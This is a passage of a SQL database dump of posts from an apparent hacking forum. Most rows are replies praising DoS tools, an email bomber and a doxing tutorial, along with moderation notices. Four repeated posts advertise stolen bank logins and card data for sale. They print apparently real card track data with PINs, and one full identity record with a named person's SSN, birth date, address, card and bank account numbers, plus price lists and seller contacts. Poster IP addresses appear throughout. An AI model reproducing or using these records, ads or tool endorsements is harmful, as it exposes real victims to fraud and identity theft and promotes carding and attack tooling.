Internet user visits your site, the user can contact you using the link on your site. The spammers probably won\'t visit your site, so the spam goes to the posted email address. [b][color=#A9A9A9][u]Protect your source code[/u][/color][/b] . Some people use that stupid right-click script to protect their source code. Not only does that not protect your code, you are disabling browser functions such as adding your site to their favorites or printing. Though many people have \"borrowed\" my source code, I would not want to disable functions that my target audience wants to use. There are scripts to make your source code hidden. This is more effective, but a pain for anyone who wants to edit your site. The preferred method is external files such as external style sheets or javascript files. Include copyright information on the page and in the meta tags for every web page. Watermark all images. Keep copies of previous versions of your site with the last modified information intact. Save files on disks, so they can be retrieved. if necessary. Visit the [url=http://www.archive.org/index.php]WayBack Machine[/url]o find previous versions of websites, if you cannot find your files. Though the information is incomplete, it is better than nothing. Buy the copyrights to important files to protect yourself from competitors or other parties.', '41.174.6.147', '699270803', '1', '0', '0', '0', '1', '78090d0f04ce2ffd6b6d81155470526f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('152', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1343949097', 'Updated. Added merge users at the bottom of the tutorial.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', '48e561f52a2bbd29be6f5aa34fd909fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('153', '50', '132', '12', 'RE: [tut]How to DOX', '0', '9', 'p420', '1343950521', 'Thanks for this DOXing tutorial. I found it very helpful.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', '2a1374943d646405eda3c5dbcb14b660', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('154', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '9', 'p420', '1343950858', 'Best DDoSer in my opinion.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', '7f67ac753ed3ecad0fe37ccd95e138b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('156', '65', '0', '41', 'Auction Thread Guidelines', '0', '1', 't3h jok3r', '1343951507', 'All auctions thread must follow this template format: [code] [b]Start Bid:[/b] [b]Buy It Now:[/b] [b]Quantity:[/b] [b]End Date:[/b] (Post with time zone e.g. 10:00 PM PST) [b]Description:[/b] [b]Accepted Payment Methods:[/b] [b]Additional Stipulations and Requirements:[/b] [/code] Rules == 1. All bids must be in threads. No PM bidding. 2. You can not cancel your bid if you are the last bidder.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', '5302438c5f36177c5358b87ae296aea9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('157', '66', '0', '63', 'Read this thread before you make a Request!', '0', '4', 'Triple H', '1343951621', '[align=center][img]http://gfxf.net/upload/images/UQGW.png[/img] [img]http://cdn1.iconfinder.com/data/icons/BRILLIANT/construction/png/72/brush.png[/img] [color=#00BFFF][size=large][b]About[/b][/size][/color] Forum Graphic Requests is made & added in Graphics tab, so other members can request any graphics they need, because there is a lot of talented members on L33THacking, either they are willing to pay or they don\'t have enough money to pay, so they can request work for free. [color=#00BFFF][size=large][b]Making a Request[/b][/size][/color] If you decided to make a request thread, please use any kind of a template, and also please try to avoid any spam, short, unrelated or off-topic posts because it will be deleted.So I recommend you to put your contact info in the thread or contact any member via PM who wants to give it a try. Also one of the most important things is, when ever you make a request please say Thanks in Advance or any kind of thanking, especially if you are requesting free graphics. [spoiler=Template Example] [color=#00BFFF][b]Size:[/b][/color] 123x456 [color=#00BFFF][b]Colour Scheme:[/b][/color] Black [color=#00BFFF][b]Render/Image:[/b][/color] http://testlink [color=#00BFFF][b]Text:[/b][/color] Username [color=#00BFFF][b]Anything else:[/b][/color] Sparks [size=xx-small]Thanks to [url=http://l33thacking.net/member.php?action=profile&uid=20]JakeUS[/url] for template sample.[/size] [b][color=#FF0000]NOTE:[/color] This template is just an example, you don\'t have to use it. You can use your own, or simply explain everything you need in thread, unless you want ordered work to stay private.[/b] [/spoiler] [color=#00BFFF][size=large][b]Expectations[/b][/size][/color] After you made a thread only thing left is to wait.If none responds to your thread after a week or more, please close it or junk it and simply make a new one. In case you cannot do that please contact any [url=http://l33thacking.net/showteam.php]Staff Member[/url] about that.Also after you posted a thread, please do not expect a \"Professional Work\" if you are offering something like 5$ or less, or even when you request a free work.To purchase professional work, you will probably need to pay more & to find a experienced artist. [color=#00BFFF][size=large][b]About Rules[/b][/size][/color] Any Rulebreaking or even other mistake in thread can affect to it. That means your thread can be: Closed, Deleted or Junked. Also no Double Posting or Adult Content in this forum.[/align]', '41.174.14.148', '699272852', '1', '0', '1', '1347249099', '1', 'd1d6104af608be6951890c216a9d04de', '0', '1347249099'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1763', '374', '1735', '19', '[Junk]PLEASE DELETE', '0', '1', 't3h jok3r', '1347249273', 'This thread has been junked.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('158', '2', '4', '34', 'RE: Userbar tut', '0', '4', 'Triple H', '1343951801', 'Nice tutorial, unfortunately I\'m not into graphics.', '41.174.14.148', '699272852', '1', '0', '0', '0', '1', 'bc888b9e633924aa38dc55bc4749467d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('159', '57', '141', '18', 'RE: Hackyer\'s Email Bomber V1.0', '0', '17', 'khade009', '1343951998', 'Nice bomber. Thanks for contributing to the community.', '41.174.14.148', '699272852', '0', '0', '0', '0', '1', 'b17cdd394381059d878b4f64cf811bd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('160', '67', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987223', 'Hello Everybody, I have In stock Dumps,logins,Paypal,cvv,fullz,Wu trf.. Contact me: Y:m: Codeshopcc@yahoo.com Y:d: Codeshopcc ICQ: 643549928 (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) I am NOT a scammer from Vietnam!(chat with me in English for being sure):cool: Record #00928... Tue Oct 16 08:54:42 2007 Track 1: B4313084818968669^techer/limicher^0809201000000000000002070000000 Track 2: 4313084818968669=08092010000000000001 Track 3: ;? PIN:5407 --------------------------------------------------------------------------- ---- Record #00929... Tue Oct 16 08:56:05 2007 Track 1: B5120255004093674^gorge linuz^0909201225000000000000000000000 Track 2: 5120255004093674=09092012250000000000 Track 3: ;? PIN:0843 --------------------------------------------------------------------------- ---- Record #000930... Tue Oct 16 08:56:14 2007 Track 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000 Track 2: 5458001140057948=09022013570000000001 Track 3: ;? PIN: 5761 -------------------------------------------------------------------------- Track1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000 Track2 : 4453263304007113=080710118652511 B4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000 ³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 Amount To Pay For That Depend On Amount You Want To Transfer Valid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license. CC fullz info, CC DOB....Domain hosting. 1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv) 1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv) 1 UK = 5 $ ( Buy > 50 price 4$/1cvv) 1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV) 1 Ca = 10 $ 1 CA (Amex,dis) = 15 $ 1 EU = 15 $ 1 EU (Amex,dis) = 17 $ 1 US (full info) = 80 $ 1 UK (full info) = 100$ Australia (AU) = 10 $ Switzerland (VE) = 15 $ France (FR) = 15 $ Germany (GE) = 15 $ Mexico (MX) = 12 $ New Zealand (NZ) = 13 $ ITALY = 15 $ I SELL MANY SHOPADMINS | Excellent Services | Great Products I can registrer for u, or i can pass to u others accounts i have already activate ! I can registrer for u,just onething u pay for this! Demo fullz cc Account Open In: MD Online ID: rgunn1a ATM or Check Card PIN: 001755 Passcode: eg15 ---------------Credit/Debit Card and Other Accounts Details------------ CC Number: 4888936039374958 Exp Date: 05/2010 Cvv: 545 CC PinNumber: eg15 Account Number: 052001633 Routing Number: 446010365904 ---------------Credit/Debit Card --------------- Full Name: bob gunn Address Line 1: 808 lowe rd Address Line 2: City: middle river State: MD Zipcode: 21220 Phone Number: E-mail: rg.gunn ---------------Identification--------------------- SSN: 216-60-8382 DOB: 04-04-1953 MMN: pinkney Driver\'s Liecence No: g50076753097 I have : us bins: 517805,488893,542432 uk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550 ger bins: 492942,490762,530127 aus bins: 543568,450605,494053,450606,456475,521893,519163 and others bins for others country..... + I can check balance in cvv, balance will be as good as you expect and price follow of agreements . + All my cvv are tested before sell, that\'s sure. (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) ............................................................................. I ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH I ALSO SELL IN BULK YOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS. READ MY THREAD WELL BEFORE YOU ADD ME IF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE. Y:m:Codeshopcc @yahoo.com Y:d: Codeshopcc Icq: 643549928 THANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', 'c453f28bbd8e40267dcb71e539b23816', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('161', '68', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987480', 'Hello Everybody, I have In stock Dumps,logins,Paypal,cvv,fullz,Wu trf.. Contact me: Y:m: Codeshopcc@yahoo.com Y:d: Codeshopcc ICQ: 643549928 (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) I am NOT a scammer from Vietnam!(chat with me in English for being sure):cool: Record #00928... Tue Oct 16 08:54:42 2007 Track 1: B4313084818968669^techer/limicher^0809201000000000000002070000000 Track 2: 4313084818968669=08092010000000000001 Track 3: ;? PIN:5407 --------------------------------------------------------------------------- ---- Record #00929... Tue Oct 16 08:56:05 2007 Track 1: B5120255004093674^gorge linuz^0909201225000000000000000000000 Track 2: 5120255004093674=09092012250000000000 Track 3: ;? PIN:0843 --------------------------------------------------------------------------- ---- Record #000930... Tue Oct 16 08:56:14 2007 Track 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000 Track 2: 5458001140057948=09022013570000000001 Track 3: ;? PIN: 5761 -------------------------------------------------------------------------- Track1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000 Track2 : 4453263304007113=080710118652511 B4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000 ³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 Valid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license. CC fullz info, CC DOB....Domain hosting. 1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv) 1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv) 1 UK = 5 $ ( Buy > 50 price 4$/1cvv) 1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV) 1 Ca = 10 $ 1 CA (Amex,dis) = 15 $ 1 EU = 15 $ 1 EU (Amex,dis) = 17 $ 1 US (full info) = 80 $ 1 UK (full info) = 100$ Australia (AU) = 10 $ Switzerland (VE) = 15 $ France (FR) = 15 $ Germany (GE) = 15 $ Mexico (MX) = 12 $ New Zealand (NZ) = 13 $ ITALY = 15 $ I SELL MANY SHOPADMINS | Excellent Services | Great Products I can registrer for u, or i can pass to u others accounts i have already activate ! I can registrer for u,just onething u pay for this! Demo fullz cc Account Open In: MD Online ID: rgunn1a ATM or Check Card PIN: 001755 Passcode: eg15 ---------------Credit/Debit Card and Other Accounts Details------------ CC Number: 4888936039374958 Exp Date: 05/2010 Cvv: 545 CC PinNumber: eg15 Account Number: 052001633 Routing Number: 446010365904 ---------------Credit/Debit Card --------------- Full Name: bob gunn Address Line 1: 808 lowe rd Address Line 2: City: middle river State: MD Zipcode: 21220 Phone Number: E-mail: rg.gunn ---------------Identification--------------------- SSN: 216-60-8382 DOB: 04-04-1953 MMN: pinkney Driver\'s Liecence No: g50076753097 I have : us bins: 517805,488893,542432 uk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550 ger bins: 492942,490762,530127 aus bins: 543568,450605,494053,450606,456475,521893,519163 and others bins for others country..... + I can check balance in cvv, balance will be as good as you expect and price follow of agreements . + All my cvv are tested before sell, that\'s sure. (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) ............................................................................. I ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH I ALSO SELL IN BULK YOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS. READ MY THREAD WELL BEFORE YOU ADD ME IF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE. Y:m:Codeshopcc @yahoo.com Y:d: Codeshopcc Icq: 643549928 THANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', 'eebf51f3bca7507254d9968c55002b0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('162', '69', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987819', 'Hello Everybody, I have In stock Dumps,Bank logins,Paypal,cvv,fullz,Wu trf.. Contact me: Y:m: Codeshopcc@yahoo.com Y:d: Codeshopcc ICQ: 643549928 (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) I am NOT a scammer from Vietnam!(chat with me in English for being sure):cool: Record #00928... Tue Oct 16 08:54:42 2007 Track 1: B4313084818968669^techer/limicher^0809201000000000000002070000000 Track 2: 4313084818968669=08092010000000000001 Track 3: ;? PIN:5407 --------------------------------------------------------------------------- ---- Record #00929... Tue Oct 16 08:56:05 2007 Track 1: B5120255004093674^gorge linuz^0909201225000000000000000000000 Track 2: 5120255004093674=09092012250000000000 Track 3: ;? PIN:0843 --------------------------------------------------------------------------- ---- Record #000930... Tue Oct 16 08:56:14 2007 Track 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000 Track 2: 5458001140057948=09022013570000000001 Track 3: ;? PIN: 5761 -------------------------------------------------------------------------- Track1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000 Track2 : 4453263304007113=080710118652511 B4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000 ³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 Valid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license. CC fullz info, CC DOB....Domain hosting. 1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv) 1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv) 1 UK = 5 $ ( Buy > 50 price 4$/1cvv) 1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV) 1 Ca = 10 $ 1 CA (Amex,dis) = 15 $ 1 EU = 15 $ 1 EU (Amex,dis) = 17 $ 1 US (full info) = 80 $ 1 UK (full info) = 100$ Australia (AU) = 10 $ Switzerland (VE) = 15 $ France (FR) = 15 $ Germany (GE) = 15 $ Mexico (MX) = 12 $ New Zealand (NZ) = 13 $ ITALY = 15 $ I SELL MANY SHOPADMINS | Excellent Services | Great Products I can registrer for u, or i can pass to u others accounts i have already activate ! I can registrer for u,just onething u pay for this! Demo fullz cc Account Open In: MD Online ID: rgunn1a ATM or Check Card PIN: 001755 Passcode: eg15 ---------------Credit/Debit Card and Other Accounts Details------------ CC Number: 4888936039374958 Exp Date: 05/2010 Cvv: 545 CC PinNumber: eg15 Account Number: 052001633 Routing Number: 446010365904 ---------------Credit/Debit Card --------------- Full Name: bob gunn Address Line 1: 808 lowe rd Address Line 2: City: middle river State: MD Zipcode: 21220 Phone Number: E-mail: rg.gunn ---------------Identification--------------------- SSN: 216-60-8382 DOB: 04-04-1953 MMN: pinkney Driver\'s Liecence No: g50076753097 I have : us bins: 517805,488893,542432 uk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550 ger bins: 492942,490762,530127 aus bins: 543568,450605,494053,450606,456475,521893,519163 and others bins for others country..... + I can check balance in cvv, balance will be as good as you expect and price follow of agreements . + All my cvv are tested before sell, that\'s sure. (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) ............................................................................. I ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH I ALSO SELL IN BULK YOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS. READ MY THREAD WELL BEFORE YOU ADD ME IF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE. Y:m:Codeshopcc @yahoo.com Y:d: Codeshopcc Icq: 643549928 THANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', '9308c6417efa1f056034ab66a45a63a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('163', '70', '0', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '4', '6', 'codeshop', '1343987972', 'Hello Everybody, I have In stock Dumps,Bank logins,Paypal,cvv,fullz,Wu trf.. Contact me: Y:m: Codeshopcc@yahoo.com Y:d: Codeshopcc ICQ: 643549928 (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) I am NOT a scammer from Vietnam!(chat with me in English for being sure):cool: Record #00928... Tue Oct 16 08:54:42 2007 Track 1: B4313084818968669^techer/limicher^0809201000000000000002070000000 Track 2: 4313084818968669=08092010000000000001 Track 3: ;? PIN:5407 --------------------------------------------------------------------------- ---- Record #00929... Tue Oct 16 08:56:05 2007 Track 1: B5120255004093674^gorge linuz^0909201225000000000000000000000 Track 2: 5120255004093674=09092012250000000000 Track 3: ;? PIN:0843 --------------------------------------------------------------------------- ---- Record #000930... Tue Oct 16 08:56:14 2007 Track 1: B5458001140057948^FAZAKERLEY/ANDREW.MR ^09022013570000000000 Track 2: 5458001140057948=09022013570000000001 Track 3: ;? PIN: 5761 -------------------------------------------------------------------------- Track1 : B4453263304007113^CANELOS/ALICIA M^08071011865200511000000 Track2 : 4453263304007113=080710118652511 B4557045535895068^KANINA BANNER PTY LTD ^111020100000 0000000375000000? 4557045535895068=11102010000037500000 ³6436535702470^MR MATTHEW T BAXTER ^11041010804 446? ;36436535702470=11041010804000446? 11/12/2008 17:51 ´715149921033372^MS JENNIFER WILLIAMS ^0904201633723372000000340000000? ;4715149921033372=09042016337233723400? 11/15/2008 12:10 ³760 105217 11155^CRAINE/BRENT ^0911061196631? ;376010521711155=0911061196631? 11/18/2008 21:28 ;4072209019630880=09102012138430885800? 11/2/2008 12:43 ´072200010613256^MR AARON JAMES RITCHIE ^1110201632563256000000344000000? ;4072200010613256=11102016325632563440 Valid and Good Uk,Eu,Asia Fullz with Dob,mmn,ssn,drivers license. CC fullz info, CC DOB....Domain hosting. 1 US (visa,master) = 3 $ ( buy > 50 Price $2/ 1cvv) 1 US (Amex,dis) = 4 $ ( buy > 50 price $3 /1cvv) 1 UK = 5 $ ( Buy > 50 price 4$/1cvv) 1 UK (with DOB ) = 15 $ ( Buy > 50 CVV Price 12$ = 1CVV) 1 Ca = 10 $ 1 CA (Amex,dis) = 15 $ 1 EU = 15 $ 1 EU (Amex,dis) = 17 $ 1 US (full info) = 80 $ 1 UK (full info) = 100$ Australia (AU) = 10 $ Switzerland (VE) = 15 $ France (FR) = 15 $ Germany (GE) = 15 $ Mexico (MX) = 12 $ New Zealand (NZ) = 13 $ ITALY = 15 $ I SELL MANY SHOPADMINS | Excellent Services | Great Products I can registrer for u, or i can pass to u others accounts i have already activate ! I can registrer for u,just onething u pay for this! Demo fullz cc Account Open In: MD Online ID: rgunn1a ATM or Check Card PIN: 001755 Passcode: eg15 ---------------Credit/Debit Card and Other Accounts Details------------ CC Number: 4888936039374958 Exp Date: 05/2010 Cvv: 545 CC PinNumber: eg15 Account Number: 052001633 Routing Number: 446010365904 ---------------Credit/Debit Card --------------- Full Name: bob gunn Address Line 1: 808 lowe rd Address Line 2: City: middle river State: MD Zipcode: 21220 Phone Number: E-mail: rg.gunn ---------------Identification--------------------- SSN: 216-60-8382 DOB: 04-04-1953 MMN: pinkney Driver\'s Liecence No: g50076753097 I have : us bins: 517805,488893,542432 uk bins: 4547,5506,5569,5404,5031,4921,5505,5506,4921,4550 ger bins: 492942,490762,530127 aus bins: 543568,450605,494053,450606,456475,521893,519163 and others bins for others country..... + I can check balance in cvv, balance will be as good as you expect and price follow of agreements . + All my cvv are tested before sell, that\'s sure. (I DO WESTERN UNION TRANSFER!! DO CONTACT ME TO ASK ME FOR THAT) ............................................................................. I ACCEPT ONLY: WESTERN UNION - MONEY GRAM - LIBERTY RESERVE - UKASH I ALSO SELL IN BULK YOU CAN CONTACT ME IF YOU WANT TO BUY BULK FOR YOUR SHOP ADMINS. READ MY THREAD WELL BEFORE YOU ADD ME IF YOU ASK FOR TEST I WONT GIVE YOU AND SAMPLE. Y:m:Codeshopcc @yahoo.com Y:d: Codeshopcc Icq: 643549928 THANKS TO YOU ALL.CONTACT ME FOR GOOD BUSINESS', '172.129.54.247', '-1400817929', '0', '0', '0', '0', '1', '7002e923190500f3c8d9b82be4a6a1f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('164', '49', '126', '21', 'RE: Pandora DDOS Bot [Direct Link]', '0', '26', 'bixlow803', '1343988182', 'Idint try this body but how it works? Pls kindly give tutorials about this. Is there need the ip and the site url?', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', 'b59c82a764d72c9b92f0a23010da3835', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('165', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '26', 'bixlow803', '1343988919', 'Nice budy but hot it works, kindly give 2torials', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', '3644cd6cda47cb79931db123df890b64', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('166', '67', '160', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003201', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('167', '69', '162', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003241', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('168', '70', '163', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003257', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('169', '68', '161', '19', '[Junk]Selling Good EU,US,UK DUMPS,BANK LOGINS,CC,WU AND BANK TRFS..GOOD DEAL', '0', '1', 't3h jok3r', '1344003305', 'This thread has been junked.', '41.174.3.50', '699269938', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('170', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '20', 'JakeUS', '1344008168', 'This is nice, it will help new Staff members.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 